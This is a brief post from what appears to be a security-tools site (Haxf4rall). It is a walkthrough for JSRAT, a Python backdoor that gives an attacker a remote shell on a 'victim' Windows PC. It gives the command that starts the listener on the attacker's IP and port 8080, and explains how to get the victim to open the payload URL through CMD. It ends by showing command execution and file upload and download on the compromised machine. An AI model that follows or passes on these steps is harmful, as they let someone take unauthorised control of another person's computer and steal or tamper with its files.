JSRAT – Javascript Backdoor to Control Victim Machine

Comments Off on JSRAT – Javascript Backdoor to Control Victim Machine

JSRAT is a python Script that can be used to get a remote shell of victim pc.

Installation & Setup :-

  • Download the JSRAT tool Here

  • Download and give appropriate permission to execute the script.Above figure shows the complete installation

Starting the web server:

  • Run and execute the command: python JSRAT.py -i <kali Linux or Attacker Ip> -p 8080

 

VICTIM MACHINE:-

  • Open this Client command URL with Victim browser

  • To gain the shell payload generated by URL should be opened with CMD.

  • Once the command is executed a shell will be obtained.

BACK TO ATTACKERS MACHINE:-

  • Here we go !!! We have connected to Victim machine

  • Let us try some windows command: Ipconfig

  • Above Figure shows executing the command calc opens up the windows calculator.JSRat can also provide upload, Read and Download files.

Related Articles

ABOUT US

Haxf4rall is a collective, a good starting point and provides a variety of quality material for cyber security professionals.

Our primary focus revolves around the latest tools released in the Infosec community and provide a platform for developers to showcase their skillset and current projects.

COMPANY
Live Chat
RESOURCES
Get Started
TOOLBOX
Tools Directory

2014 – 2020 | Haxf4rall.com               Stay Connected:

Facebook Twitter Google-plus Wordpress